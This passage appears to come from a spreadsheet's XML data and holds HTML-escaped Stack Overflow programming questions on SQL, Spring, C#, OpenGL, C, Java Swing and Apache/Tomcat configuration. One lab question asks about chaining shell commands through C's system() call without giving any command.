&lt;p&gt;What I'm trying to do is get the gp_id from gp.keywords where the the keywords table keyword_id column is a specific value and the practice_link is the practices table corresponds to the gp_id that I have, which is stored in the id column of that table.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>app GUI similar to Control Panel in Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was playing a bit with Windows Vista (still using XP) and I liked how the standard Control Panel worked. Do you think this design is good also for normal applications?&lt;/p&gt;
&lt;p&gt;I like the idea of showing main topics with large fonts + icons. Details within each main topic are displayed using a small font and are immediatelly accessible without the need to browse the menu. Probably everybody knows Vista, but anyway, &lt;a href="http://www.computerperformance.co.uk/images/Vista/control_panel2.jpg" rel="nofollow"&gt;here&lt;/a&gt; is the Control Panel layout.&lt;/p&gt;
&lt;p&gt;Compared to a classic layout of icons for main topics and menu for minor topics, the Control Panel GUI seems to be good at first sight.&lt;/p&gt;
&lt;p&gt;I haven't seen any app using this kind of GUI, so I don't know if I should rather use the common approach with icons and menu for a common application? Maybe this Control Panel GUI is suitable only for setting some options, other than working with any data?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Duplicate spring configurations being loaded?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking at the output from spring being loaded up by tomcat and there's something very strange...Everything is duplicated.  What would cause this?  Whatever it is, it's causing my application to run in odd ways.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Additional Info:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The application is a web app. All the spring information is loaded using the context loader(?) defined in the web.xml file.  My configuration files are split amoung 6 (or so) files.&lt;/p&gt;
&lt;p&gt;Example debug output:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;[DEBUG,DefaultFilterInvocationDefinitionSource,main] Added URL pattern: /&lt;code&gt;**&lt;/code&gt;; attributes: [REQUIRES_SECURE_CHANNEL]&lt;/p&gt;
  &lt;p&gt;[DEBUG,DefaultFilterInvocationDefinitionSource,main] Added URL pattern: /&lt;code&gt;**&lt;/code&gt;; attributes: [REQUIRES_SECURE_CHANNEL]&lt;/p&gt;
  &lt;p&gt;[DEBUG,DefaultFilterInvocationDefinitionSource,main] Added URL pattern: /&lt;code&gt;**&lt;/code&gt;; attributes: [ROLE_READ, ROLE_UPDATE]&lt;/p&gt;
  &lt;p&gt;[DEBUG,DefaultFilterInvocationDefinitionSource,main] Added URL pattern: /&lt;code&gt;**&lt;/code&gt;; attributes: [ROLE_READ, ROLE_UPDATE]&lt;/p&gt;
  &lt;p&gt;[DEBUG,AbstractFallbackMethodDefinitionSource,main] Adding security method [CacheKey[com.service.impl.FooServiceImpl; public abstract java.lang.Boolean com.service.IFooService.saveOrUpdateFoo(com.model.Foo2,java.lang.String) throws org.springframework.dao.DataAccessException]] with attribute [[ROLE_UPDATE]]&lt;/p&gt;
  &lt;p&gt;[DEBUG,AbstractFallbackMethodDefinitionSource,main] Adding security method [CacheKey[com.service.impl.FooServiceImpl; public abstract java.lang.Boolean com.service.IFooService.saveOrUpdateFoo(com.model.Foo2,java.lang.String) throws org.springframework.dao.DataAccessException]] with attribute [[ROLE_UPDATE]]&lt;/p&gt;
  &lt;p&gt;[INFO,AbstractSecurityInterceptor,main] Validated configuration attributes&lt;/p&gt;
  &lt;p&gt;[INFO,AbstractSecurityInterceptor,main] Validated configuration attributes&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>C# refreshing textbox from BindingSource</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having difficulty refreshing windows forms controls that are using a BindingSource object. We have a CAB/MVP/SCSF client that I (actually â€œweâ€ since it is a team effort) are developing that will interact with WCF services running on a remote server.  (This is our first attempt at this, so we are in a learning mode).   One of the calls (from the Presenter) to the service returns a DataSet that contains 3 DataTables, named â€œContractâ€, â€œLoanâ€ and â€œTermsâ€.  Each table contains just one row.  When the service returns the dataset, we store it in the SmartPart/View in a class member variable, by calling a function in the view called BindData() and passing the dataset in to the view from the presenter class;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private System.Data.DataSet _ds = null;
public void BindData(System.Data.DataSet ds)
{
    string sErr = "";
    try
    {
        _ds = ds;  // save to private member variable
        // more code goes down here
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We are trying to bind each of the three DataTables to an assortment of Windows Forms TextBoxes, MaskedEditBoxes, and Infragistics UltraComboEditor Dropdown comboboxes We created three BindingSource objects, one for each DataTable using the VS2008 IDE.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private System.Windows.Forms.BindingSource bindsrcContract;
private System.Windows.Forms.BindingSource bindsrcLoan;
private System.Windows.Forms.BindingSource bindsrcTerms;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We are binding the values like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (bindsrcContract.DataSource == null)
{
    bindsrcContract.DataSource = _ds;
    bindsrcContract.DataMember = â€œcontractâ€;
    txtContract.DataBindings.Add(new Binding("Text", bindsrcContract, "contract_id", true));                       
    txtLateFeeAmt.DataBindings.Add(new Binding("Text", bindsrcContract, "fee_code", true));
    txtPrePayPenalty.DataBindings.Add(new Binding("Text", bindsrcContract, "prepay_penalty", true));
    txtLateFeeDays.DataBindings.Add(new Binding("Text", bindsrcContract, "late_days", true));
}
if (bindsrcLoan.DataSource == null)
{
    bindsrcLoan.DataSource = _ds;
    bindsrcLoan.DataMember = â€œloanâ€;
    mskRecvDate.DataBindings.Add(new Binding("Text", bindsrcLoan, "receive_date", true));
    cmboDocsRcvd.DataBindings.Add(new Binding("Value", bindsrcLoan, "docs", true));     
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works when we do the first read from the service and get a dataset back.  The information is displayed on the form's controls, we can update it using the form, and then â€œsaveâ€ it by passing the changed values back to the WCF service.&lt;/p&gt;
&lt;p&gt;Here is our problem.  If we select a different loan key and make the same call to the service and get a new DataSet, again with 3 tables with one row each, the controls (textboxes, masked edit boxes, etc.) are not being updated with the new information.  Note that the smartPart/View is not closed or anything, but remains loaded in between calls to the service.  On the second call we are not rebinding the calls, but simply trying to get the data to refresh from the updated DataSet.&lt;/p&gt;
&lt;p&gt;We have tried everything we can think of, but clearly we are missing something.  This is our first attempt at using the BindingSource control. We have tried&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bindsrcContract.ResetBindings(false);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bindsrcContract.ResetBindings(true);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bindsrcContract.RaiseListChangedEvents = true;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i = 0; i &amp;lt; bindsrcContract.Count; i++)
{
    bindsrcContract.ResetItem(i);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As well as resetting the DataMember property again.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bindsrcContract.DataMember = â€Contractâ€;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Weâ€™ve looked at a lot of examples.  Many examples make reference to the BindingNavigator but since the DataTables only have one row, we did not think we needed that. There are a lot of examples for grids, but weâ€™re not using one here.  Can anyone please point out where we are going wrong, or point us to resources that will provide some more information?&lt;/p&gt;
&lt;p&gt;Weâ€™re using VisualStudio 2008, C# and .Net 2.0, XP client, W2K3 server.&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
&lt;p&gt;wes&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do parentheses in a C variable declaration mean?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone explain what this means?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int (*data[2])[2];
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>opengl set texture color with vertex color</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Because I need to display a &lt;a href="http://codeflow.org/ubuntu.png" rel="nofollow"&gt;huge number of labels&lt;/a&gt; that &lt;a href="http://www.youtube.com/watch?v=A_ah-SE-cNY" rel="nofollow"&gt;move independently&lt;/a&gt;, I need to render a label in &lt;a href="http://pyglet.org" rel="nofollow"&gt;pyglet&lt;/a&gt; to a texture (otherwise updating the vertex list for each glyph is too slow).&lt;/p&gt;
&lt;p&gt;I have a solution to do this, but my problem is that the texture that contains the glyphs is black, but I'd like it to be red. See the example below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from pyglet.gl import *
def label2texture(label):
    vertex_list = label._vertex_lists[0].vertices[:]
    xpos = map(int, vertex_list[::8])
    ypos = map(int, vertex_list[1::8])
    glyphs = label._get_glyphs()
    xstart = xpos[0]
    xend = xpos[-1] + glyphs[-1].width
    width = xend - xstart
    ystart = min(ypos)
    yend = max(ystart+glyph.height for glyph in glyphs)
    height = yend - ystart
    texture = pyglet.image.Texture.create(width, height, pyglet.gl.GL_RGBA)
    for glyph, x, y in zip(glyphs, xpos, ypos):
        data = glyph.get_image_data()
        x = x - xstart
        y =  height - glyph.height - y + ystart
        texture.blit_into(data, x, y, 0)
    return texture.get_transform(flip_y=True)
window = pyglet.window.Window()
label = pyglet.text.Label('Hello World!', font_size = 36)
texture = label2texture(label)
@window.event
def on_draw():
    hoff = (window.width / 2) - (texture.width / 2)
    voff = (window.height / 2) - (texture.height / 2)
    glClear(GL_COLOR_BUFFER_BIT)
    glEnable(GL_BLEND)
    glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
    glClearColor(0.0, 1.0, 0.0, 1.0)
    window.clear()
    glEnable(GL_TEXTURE_2D);
    glBindTexture(GL_TEXTURE_2D, texture.id)
    glColor4f(1.0, 0.0, 0.0, 1.0) #I'd like the font to be red
    glBegin(GL_QUADS);
    glTexCoord2d(0.0,1.0); glVertex2d(hoff,voff);
    glTexCoord2d(1.0,1.0); glVertex2d(hoff+texture.width,voff);
    glTexCoord2d(1.0,0.0); glVertex2d(hoff+texture.width,voff+texture.height);
    glTexCoord2d(0.0,0.0); glVertex2d(hoff, voff+texture.height);
    glEnd();
pyglet.app.run()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any idea how I could color this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AJAX console window with ANSI/VT100 support?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm planning to write gateway web application, which would need "terminal window" with VT100/ANSI escape code support. Are there any AJAX based alternatives for such a task?&lt;/p&gt;
&lt;p&gt;I'm thinking something like this: &lt;a href="http://tryruby.hobix.com/"&gt;http://tryruby.hobix.com/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My preferred backend for the system is Python/Twisted/Pylons, but since I'm just planning, I will explore every option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Autocomplete on SQL Management Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know if there's an add-in that does autocomplete for queries on SQL Management Studio?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you modify CPU registers from within VS2008 IDE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Was just wondering if there was a way to edit the CPU registers (i.e. EAX, EBX, ECX, etc) or flags (OV, UP, erc) from within the Visual Studio IDE.  I know you can &lt;strong&gt;view&lt;/strong&gt; them using the Registers pane (ctrl-shift-G) and you can cycle through them with TAB or ENTER, but I don't seem to be able to change any of them while debugging (yes, program execution is halted :)).&lt;/p&gt;
&lt;p&gt;I don't really have a strong need to do so, it's just that: I can see the assembly... I used to be able to do this (VC++6)... why can't I now, kind'a thing!&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strategic Advice: Upgrading the Design of a Web App</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an ASP.NET web site dedicated to reporting on PBX extension stats.  It comprises many report pages, with HTML generated almost purely by code-behind (setting a Label control's Text property instead of using Response.Write), using un-parameterised string literal SQL queries that populate By Reference DataTable parameters.&lt;/p&gt;
&lt;p&gt;Maintenance pages at least comprise DataGrids and detail forms, but use the same DAL, on e thing for which can be said is that it supports multiple DB servers, with sub-classes each overriding these access methods with their own string literal queries.&lt;/p&gt;
&lt;p&gt;What do I need to consider cleaning up this mess?  I've already made an almost obvious decision to use a third party reporting solution, and move the queries to stored procs in their respective DB languages, narrowing the diversity of the different DAL classes, and to separate CSS out to shared files, as lots of it is very hidden in C# files!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Variable LIMIT Clause in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a stored procedure where I have an input parameter called my_size that is an int, I want to be able to use in a limit clause in a select statement. Apparently this is not supported, is there a way to work around this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# I want something like:
SELECT * FROM some_table LIMIT my_size;
# Instead of hardcoding a permanent limit:
SELECT * FROM some_table LIMIT 100;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Subversion vs CVS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used both SVN and CVS a little bit, but will need to choose one for a new project I will be starting.&lt;/p&gt;
&lt;p&gt;Can anyone who has used both extensively please offer some pros and cons and which they think is better?  Best learning resources would be appreciated too.&lt;/p&gt;
&lt;p&gt;This will be for a small project, just one or two developers to start.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSApplication and -applicationDidFinishLaunching:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application where I have a &lt;code&gt;main.m&lt;/code&gt; that returns &lt;code&gt;NSApplicationMain(argc,  (const char **) argv);&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I want to run code on &lt;code&gt;-applicationDidFinishLaunching:&lt;/code&gt;, but I just dont see how to do it. &lt;/p&gt;
&lt;p&gt;Can anyone help or have an example? &lt;/p&gt;
&lt;p&gt;Thanks!
-Jason&lt;/p&gt;
</t>
  </si>
  <si>
    <t>dimensions of loaded swf's stage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the situation - I've got a shell that loads an external .swf. Now, that .swf is 800x600, but it's an animation piece, and there are elements that extends off the stage. When I load the .swf into the shell and call its width attribute, it returns 1200 - because it's including the elements that break out of the stage.&lt;/p&gt;
&lt;p&gt;This isn't what I want - ideally, there would be two properties, one to return the 'calculated width' and one to return the 'default width'. Do these properties exist, and if not, what's the best workaround?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using a Single system() Call to Execute Multiple Commands in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an information security lab I'm working on, I've been tasked with executing multiple commands with a single call to "system()" (written in C, running on Fedora).  What is the syntax that will allow me to execute more than command through system()?  (The idea being you could execute arbitrary commands through a program running on a remote computer, if the program interacts with the OS through the system() call.)&lt;/p&gt;
&lt;p&gt;I.e.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char command[] = "????? \r\n"; 
system(command);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Which variables should I typecast when doing math operations in C/C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example, when I'm dividing two ints and want a float returned, I superstitiously write something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int a = 2, b = 3;
float c = (float)a / (float)b;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I do not cast &lt;code&gt;a&lt;/code&gt; and &lt;code&gt;b&lt;/code&gt; to floats, it'll do integer division and return an int.&lt;/p&gt;
&lt;p&gt;Similarly, if I want to multiply a signed 8-bit number with an unsigned 8-bit number, I will cast them to signed 16-bit numbers before multiplying for fear of overflow:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;u8 a = 255;
s8 b = -127;
s16 = (s16)a * (s16)b;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How exactly does the compiler behave in these situations when not casting at all or when only casting one of the variables? Do I really need to explicitly cast all of the variables, or just the one on the left, or the one on the right?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OOP Problems to use for Coding Tests during interviews</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a second interview I get people to sit down and write code...I try to make the problem really technology independent.&lt;/p&gt;
&lt;p&gt;My programming problems that I have don't really exercise peoples OO abilities.  I tend to try and keep the coding problem solvable within 2 hours ish.  So, I've struggled to find a problem small enough and involved enough that it exposes peoples OO design skills.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rename files in sub directories</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way of batch renaming files in sub directories?&lt;/p&gt;
&lt;p&gt;Example: &lt;/p&gt;
&lt;p&gt;Rename *.html to *.htm in a folder which has directories and sub directories.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>send key for right arrow</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;what is the syntax for the sendkey for rightarrow  in .net?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Button text in JTable renderer not visible. Why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom cell renderer set in JTable and it works but instead an "x" visible on buttons being table cells I see "..." (three dots). What did I miss ??&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  /***************************************************************************
 * Listener reagujÄ…cy na dodanie nowej wartoÅ›ci
 **************************************************************************/
private static class ButtonRenderer extends JButton implements
		TableCellRenderer {
	/***********************************************************************
	 * Konstruktor
	 **********************************************************************/
	public ButtonRenderer() {
		super("x");
	}
	/***********************************************************************
	 * @see TableCellRenderer#getTableCellRendererComponent(JTable, Object,
	 *      boolean, boolean, int, int)
	 **********************************************************************/
	public Component getTableCellRendererComponent(JTable table,
			Object value, boolean isSelected, boolean hasFocus, int row,
			int column) {
		return this;
	}
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>EBNF to fluent interface</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have recently had the need to write a fluent interface for C# that will essentially mirror SQL.  Yes, I am aware of LINQ to SQL, but I'm interesting in getting "closer to the metal"--having something that essentially provides nothing more than an Intellisensified SQL shim &lt;em&gt;within&lt;/em&gt; C#.&lt;/p&gt;
&lt;p&gt;E.g.,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var fq = new FluentQuery();
Expression&amp;lt;Action&amp;gt; =
    () =&amp;gt; fq.SELECT.DISTINCT(Foo.ID).FROM(Foo).WHERE(Foo.Age &amp;gt; 22);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, I was thinking that this concept could be generalised--that is, how about a general EBNF to fluent interface generator?  Does anyone know if such a beast exists?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set up a test project for a Eclipse plugin project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a eclipse plug-in and I've tried to create another test project seperate from the plug-in. The reason I do this is to not let the plug-in depend on jUnit when it is exported. However, I can't access the Eclipse Plug-in API when I do the testing. Whenever I try to add Plug-in dependencies the import list to that is empty.&lt;/p&gt;
&lt;p&gt;Does anyone know how to import Eclipse plug-in API to an existing project? The workspace layout looks like this at the moment:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+- com.foo.myplugin
|     |
|     +- JRE System Library
|     |
|     +- Plug-in Dependencies
|     |
|     +- src
|     |
|     +- icons, META-INF, plugin.xml, etc...
|
+- com.foo.myplugin.test
      |
      +- JRE System Library
      |
      +- JUnit 4
      |
      +- src
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the worst abuse you've seen of LINQ syntax?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On a recent &lt;a href="http://www.dotnetrocks.com/default.aspx?showNum=383"&gt;Dot Net Rocks podcast&lt;/a&gt;, Jon Skeet mentioned possible abuses of LINQ syntax. What examples have people seen where crazy things are being done with LINQ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is void** an acceptable type in ANSI-C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have seen a function whose prototype is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int myfunc(void** ppt)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function is called in a C file as 
    a = myfunc(mystruct **var1);&lt;/p&gt;
&lt;p&gt;where mystruct is typedef for one of structure we have. &lt;/p&gt;
&lt;p&gt;This works without any compilation errors in MSVC6.0, But when I compile it with some other C compiler, it gives an error at the place where this function is called with error message:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Argument of type mystruct ** is incompatible with parameter of type void **&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The argument of myfunc() is kept as void** because it seems to be a generic malloc kind of function to be called with various structure variable types for memory allocation  &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is there any type such as void ** allowed in C standard/any C compilers?&lt;/li&gt;
&lt;li&gt;How do I fix this? [I tried casting the function call argument to &lt;code&gt;mystruct**&lt;/code&gt;, but it didn't work]&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;-AD&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for a Report Designer that allows connection to a RESTful webservice</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a Report Designer that will allow me to connect to a RESTful webservice. Ideally I would like one that has a royalty-free End-User Report Designer. WE will be hosting it in an ASP.NET web site. So something compatable with that would be ideal ;)&lt;/p&gt;
&lt;p&gt;We used to use &lt;a href="http://www.datadynamics.com/Products/ProductOverview.aspx?Product=ARNET3" rel="nofollow"&gt;Data Dynamics Active Reports&lt;/a&gt;. However this doesn't allow connections to webservices.&lt;/p&gt;
&lt;p&gt;Any help, very much appreciated.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
&lt;p&gt;Crafty&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Symfony app - how to add calculated fields to Propel objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way of working with calculated fields of Propel objects?&lt;/p&gt;
&lt;p&gt;Say I have an object "Customer" that has a corresponding table "customers" and each column corresponds to an attribute of my object. What I would like to do is: add a calculated attribute "Number of completed orders" to my object when using it on View A but not on Views B and C.&lt;/p&gt;
&lt;p&gt;The calculated attribute is a COUNT() of "Order" objects linked to my "Customer" object via ID.&lt;/p&gt;
&lt;p&gt;What I can do now is to first select all Customer objects, then iteratively count Orders for all of them, but I'd think doing it in a single query would improve performance. But I cannot properly "hydrate" my Propel object since it does not contain the definition of the calculated field(s).&lt;/p&gt;
&lt;p&gt;How would you approach it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert big numbers to decimal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;0x34363932353433373538323038353135353439&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an equivalent of ComboBoxRenderer for NumericUpDown?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to draw spinner controls, such as those found on a NumericUpDown, on a custom component.  If I want to draw a drop-down button, I can use ComboBoxRenderer.  Is there an equivalent of ComboBoxRenderer for NumericUpDown?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is SPRING.Net the best framework for Aspect Oriented Programming(AOP)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please give me the advantages and disadvantages of using the particular framework.&lt;/p&gt;
&lt;p&gt;Can give me examples of successes where you have used AOP in you .net applications?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect when JavaScript is disabled in ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the Render method of an ASP.NET web-control, I need to alter the output of the Html based on whether JavaScript is enabled or disabled on the clients browser,&lt;/p&gt;
&lt;p&gt;Does anyone know the right incantation to figure that out?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find a user's Active Directory display name in a C# web application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a web application which uses windows authentication and I can happily get the user's login name using something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; string login = User.Identity.Name.ToString();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I don't need their login name I want their DisplayName. I've been banging my head for a couple hours now...&lt;/p&gt;
&lt;p&gt;Can I access my organisation's AD via a web application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apache/Tomcat error - wrong pages being delivered</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This error has been driving me nuts. We have a server running Apache and Tomcat, serving multiple different sites. Normally the server runs fine, but sometimes an error happens where people  are served the wrong page - &lt;strong&gt;the page that &lt;em&gt;somebody else&lt;/em&gt; requested!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Clues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The pages being delivered are those that another user requested recently, and are otherwise delivered correctly. It's been known for two simultaneous requests to be swapped. As far as I can tell, none of the pages being incorrectly delivered are older than a few minutes.&lt;/li&gt;
&lt;li&gt;It only affects the files that are being served by Tomcat. Static files like images are unaffected.&lt;/li&gt;
&lt;li&gt;It doesn't happen all the time. When it does happen, it happens for everybody.&lt;/li&gt;
&lt;li&gt;It seems to happen at times of peak demand. However, the demand is not yet very high - it's certainly well within the bounds of what Apache can cope with.&lt;/li&gt;
&lt;li&gt;Restarting Tomcat fixed it, but only for a few minutes. Restarting Apache fixed it, but only for a few minutes.&lt;/li&gt;
&lt;li&gt;The server is running Apache 2 and Tomcat 6, using a Java 6 VM on Gentoo. The connection is with AJP13, and &lt;code&gt;JkMount&lt;/code&gt; directives within &lt;code&gt;&amp;lt;VirtualHost&amp;gt;&lt;/code&gt; blocks are correct.&lt;/li&gt;
&lt;li&gt;There's nothing of use in any of the log files.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Further information:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Apache does not have any form of caching turned on. All the caching-related entries in httpd.conf and related imports say, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;IfDefine CACHE&amp;gt;
  LoadModule cache_module modules/mod_cache.so
&amp;lt;/IfDefine&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While the options for Apache don't include that flag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;APACHE2_OPTS="-D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -D JK"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Tomcat likewise has no caching options switched on, that I can find.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/246540/apachetomcat-error-wrong-pages-being-delivered#246566"&gt;toolkit's suggestion&lt;/a&gt; was good, but not appropriate in this case. What leads me to believe that the error can't be within my own code is that it isn't simply a few values that are being transferred - it's the entire request, including the URL, parameters, session cookies, the whole thing. People are getting pages back saying "You are logged in as John", when they clearly aren't.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Based on suggestions from several people, I'm going to add the following HTTP headers to Tomcat-served pages to disable all forms of caching:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Cache-Control: no-store
Vary: *
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Hopefully these headers will be respected not just by Apache, but also by any other caches or proxies that may be in the way. Unfortunately I have no way of deliberately reproducing this error, so I'm just going to have to wait and see if it turns up again.&lt;/p&gt;
&lt;p&gt;I notice that the following headers are being included - could they be related in any way?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Connection: Keep-Alive
Keep-Alive: timeout=5, max=66
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Apparently this happened again while I was asleep, but has stopped happening now I'm awake to see it. Again, there's nothing useful in the logs that I can see, so I have no clues to what was actually happening or how to prevent it.&lt;/p&gt;
&lt;p&gt;Is there any extra information I can put in Apache or Tomcat's logs to make this easier to diagnose?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Since this has happened again a couple of times, we've changed how Apache connects to Tomcat to see if it affects things. We were using &lt;code&gt;mod_jk&lt;/code&gt; with a directive like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JkMount /portal ajp13
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We've switched now to using &lt;code&gt;mod_proxy_ajp&lt;/code&gt;, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ProxyPass /portal ajp://localhost:8009/portal
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We'll see if it makes any difference. This error was always annoyingly unpredictable, so we can never definitively say if it's worked or not.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
